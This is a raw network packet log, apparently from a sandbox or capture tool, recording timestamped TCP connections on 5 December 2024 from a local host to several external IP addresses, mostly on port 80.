                                                                                Dec 5, 2024 14:25:32.006140947 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.084537029 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.084553957 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.084641933 CET4976080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.084763050 CET4976080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089039087 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.089092970 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089162111 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089169979 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.089232922 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.103856087 CET8049759182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:32.104482889 CET8049761182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:32.112166882 CET8049767183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:32.112251997 CET4976780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.112603903 CET4976780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.125863075 CET8049768183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:32.126070023 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.126265049 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.204452991 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.210272074 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.232376099 CET8049767183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:32.247606993 CET8049768183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:33.685031891 CET8049768183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:33.685414076 CET8049767183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:33.692904949 CET4976780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:33.693546057 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:40.148854971 CET8049722114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:40.148937941 CET4972280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.161995888 CET4972280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.163383007 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.282011986 CET8049722114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:40.283139944 CET8049784114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:40.283250093 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.284688950 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.404516935 CET8049784114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.005281925 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.005301952 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.126002073 CET8049790183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.126015902 CET8049791183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.126240969 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.126562119 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.126564026 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.127466917 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.250005007 CET8049790183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.250885963 CET8049791183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.383518934 CET8049730114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.383579969 CET4973080192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.383656979 CET4973080192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.385215044 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.503386974 CET8049730114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.504935026 CET8049792114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.505045891 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.505218983 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.625711918 CET8049792114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:44.677705050 CET8049791183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:44.691282034 CET8049790183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:44.722615004 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:44.735698938 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:44.751296043 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:44.795432091 CET4979680192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:44.795617104 CET4979780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:44.795747995 CET4979880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:44.795933008 CET4979980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:44.915179014 CET8049796119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:44.915256977 CET4979680192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:44.915326118 CET8049797119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:44.915385962 CET4979780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:44.915419102 CET8049798182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:44.915465117 CET4979880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:44.915599108 CET8049799182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:44.915630102 CET4979680192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:44.915631056 CET4979780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:44.915647984 CET4979980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:44.915756941 CET4979980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:44.915976048 CET4979880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:45.035516024 CET8049796119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:45.035563946 CET8049797119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:45.035574913 CET8049799182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:45.035728931 CET8049798182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:46.334748983 CET8049797119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:46.334829092 CET4979780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:46.334877968 CET8049797119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:46.335014105 CET4979780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:46.335659981 CET4979780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:46.336008072 CET8049796119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:46.336071014 CET8049796119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:46.336136103 CET4979680192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:46.336169004 CET4979680192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:46.342024088 CET4980580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:46.343708038 CET4980680192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:46.455348015 CET8049797119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:46.455821037 CET8049796119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:46.461888075 CET804980549.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:46.463090897 CET4980580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:46.463424921 CET804980649.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:46.463459015 CET4980580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:46.463496923 CET4980680192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:46.463852882 CET4980680192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:46.583538055 CET804980549.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:46.583892107 CET804980649.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:46.960572958 CET8049798182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:46.960587978 CET8049798182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:46.960634947 CET4979880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960700035 CET4979880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960755110 CET4979880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960834980 CET8049799182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:46.960885048 CET8049799182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:46.960886002 CET4979980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960921049 CET4979980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:46.963978052 CET4979980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:47.081141949 CET8049798182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:47.084489107 CET8049799182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:48.021922112 CET804980549.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:48.028234005 CET4980580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:48.036273956 CET804980649.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:48.041212082 CET4980680192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:48.041973114 CET4980980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:48.164648056 CET8049809123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:48.164726019 CET4980980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:48.165139914 CET4980980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:48.285068035 CET8049809123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:49.741013050 CET8049809123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:49.747077942 CET4980980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:49.751990080 CET4981580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:49.871881008 CET8049815183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:49.871973038 CET4981580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:49.872381926 CET4981580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:49.992553949 CET8049815183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:54.440876961 CET8049815183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:54.446697950 CET4981580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:54.786572933 CET4982780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:54.906313896 CET8049827183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:54.906421900 CET4982780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:54.906795979 CET4982780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:55.026612997 CET8049827183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:57.042303085 CET8049827183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:57.046756029 CET4982780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:57.049510956 CET4983380192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:57.169425011 CET804983349.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:57.169555902 CET4983380192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:57.169873953 CET4983380192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:57.289613962 CET804983349.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:58.726234913 CET804983349.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:25:58.769536018 CET4983380192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:58.972887993 CET4983380192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:25:58.974083900 CET4983780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:59.094153881 CET804983727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:59.094257116 CET4983780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:59.101828098 CET4983780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:59.221556902 CET804983727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:02.165230036 CET8049784114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:02.165298939 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:02.165461063 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:02.166043997 CET4984680192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:02.285213947 CET8049784114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:02.285818100 CET8049846114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:02.286015034 CET4984680192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:02.286087990 CET4984680192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:02.405922890 CET8049846114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:04.150521040 CET804983727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:04.158782005 CET4983780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:04.159060001 CET4985080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:04.279217958 CET804985027.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:04.281757116 CET4985080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:04.282144070 CET4985080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:04.401907921 CET804985027.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:05.430860043 CET8049792114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:05.431001902 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:05.431075096 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:05.431490898 CET4985480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:05.551117897 CET8049792114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:05.551350117 CET8049854114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:05.551434040 CET4985480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:05.551978111 CET4985480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:05.671760082 CET8049854114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:06.148055077 CET804985027.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:06.152431965 CET4985080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:06.157520056 CET4985780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:06.277264118 CET804985727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:06.277345896 CET4985780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:06.277710915 CET4985780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:06.397396088 CET804985727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:08.225368977 CET804985727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:08.229545116 CET4985780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:08.229856014 CET4986280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:08.349518061 CET804986227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:08.349603891 CET4986280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:08.349941969 CET4986280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:08.469762087 CET804986227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:10.089207888 CET804986227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:10.144501925 CET4986280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:10.145783901 CET4986280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:15.736294031 CET4987980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:15.856127024 CET8049879123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:15.856234074 CET4987980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:15.859374046 CET4987980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:15.980442047 CET8049879123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:17.393886089 CET8049879123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:17.399118900 CET4987980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:17.401731968 CET4988380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:17.521624088 CET8049883183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:17.521758080 CET4988380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:17.521855116 CET4988380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:17.641470909 CET8049883183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:19.079374075 CET8049883183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:19.121869087 CET4988380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:19.276698112 CET4988980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:19.397046089 CET8049889183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:19.397110939 CET4988980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:19.401590109 CET4988980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:19.521388054 CET8049889183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:20.950156927 CET8049889183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:20.954637051 CET4988980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:20.960127115 CET4989280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:20.962634087 CET4989380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:21.079873085 CET8049892119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:21.079947948 CET4989280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:21.080108881 CET4989280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:21.082365990 CET8049893182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:21.082429886 CET4989380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:21.082573891 CET4989380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:21.199832916 CET8049892119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:21.202210903 CET8049893182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:22.302628040 CET8049892119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:22.302706957 CET4989280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:22.302772045 CET8049892119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:22.302779913 CET4989280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:22.302841902 CET4989280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:22.307538986 CET4989880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:22.422755957 CET8049892119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:22.428244114 CET804989849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:22.428320885 CET4989880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:22.428438902 CET4989880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:22.488765955 CET4971580192.168.2.5119.28.131.242
                                                                                Dec 5, 2024 14:26:22.488845110 CET497065566192.168.2.543.154.56.182
                                                                                Dec 5, 2024 14:26:22.489187956 CET4984680192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:22.489233971 CET4985480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:22.489252090 CET4989380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:22.548163891 CET804989849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:22.609764099 CET8049715119.28.131.242192.168.2.5
                                                                                Dec 5, 2024 14:26:22.609846115 CET4971580192.168.2.5119.28.131.242
                                                                                Dec 5, 2024 14:26:22.609865904 CET55664970643.154.56.182192.168.2.5
                                                                                Dec 5, 2024 14:26:22.609937906 CET497065566192.168.2.543.154.56.182
                                                                                Dec 5, 2024 14:26:26.970990896 CET804989849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:26.975692987 CET4989880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:27.115212917 CET4990980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:27.235002041 CET804990927.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:27.235107899 CET4990980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:27.235205889 CET4990980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:27.354902029 CET804990927.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:29.016957045 CET804990927.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:29.023478031 CET4991580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:29.023499966 CET4990980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:29.143239021 CET804991527.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:29.143749952 CET4991580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:29.143914938 CET4991580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:29.263832092 CET804991527.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:30.978671074 CET804991527.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:30.985702991 CET4991580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:30.990710974 CET4992080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:30.991303921 CET4992280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:30.991306067 CET4992180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:31.110537052 CET8049920119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:31.110744953 CET4992080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:31.110945940 CET4992080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:31.111136913 CET8049922114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:31.111174107 CET8049921182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:31.111428976 CET4992180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:31.111428022 CET4992280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:31.111548901 CET4992280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:31.111598969 CET4992180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:31.230770111 CET8049920119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:31.231530905 CET8049922114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:31.231549025 CET8049921182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:32.332231998 CET8049920119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:32.332581997 CET8049920119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:32.332586050 CET4992080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:32.332638979 CET4992080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:32.548100948 CET4992080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:32.574199915 CET4992480192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:32.669400930 CET8049920119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:32.694026947 CET804992427.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:32.694117069 CET4992480192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:32.694230080 CET4992480192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:32.814150095 CET804992427.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:32.876100063 CET8049921182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:32.876265049 CET8049921182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:32.876492977 CET4992180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:32.876593113 CET4992180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:32.996350050 CET8049921182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:34.480926991 CET804992427.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:34.484966993 CET4992480192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:34.485404968 CET4993080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:34.605382919 CET804993027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:34.605479956 CET4993080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:34.605550051 CET4993080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:34.725312948 CET804993027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:36.456247091 CET804993027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:36.461334944 CET4993080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:36.462393045 CET4993680192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:36.582277060 CET8049936183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:36.582353115 CET4993680192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:36.582461119 CET4993680192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:36.702240944 CET8049936183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:38.138217926 CET8049936183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:38.144373894 CET4993680192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:38.150243998 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:38.151088953 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:38.151858091 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:38.270031929 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:38.270097971 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:38.270463943 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:38.270793915 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:38.270843983 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:38.270967007 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:38.271611929 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:38.271655083 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:38.271783113 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:38.390413046 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:38.391072035 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:38.391781092 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.492655039 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.492705107 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.492886066 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:39.492958069 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:39.513715029 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:39.614227057 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.634681940 CET804994849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:39.637914896 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:39.638016939 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:39.758879900 CET804994849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:39.844280005 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:39.844408989 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:39.844430923 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:39.844540119 CET4994380192.168.2.5182.254.116.116
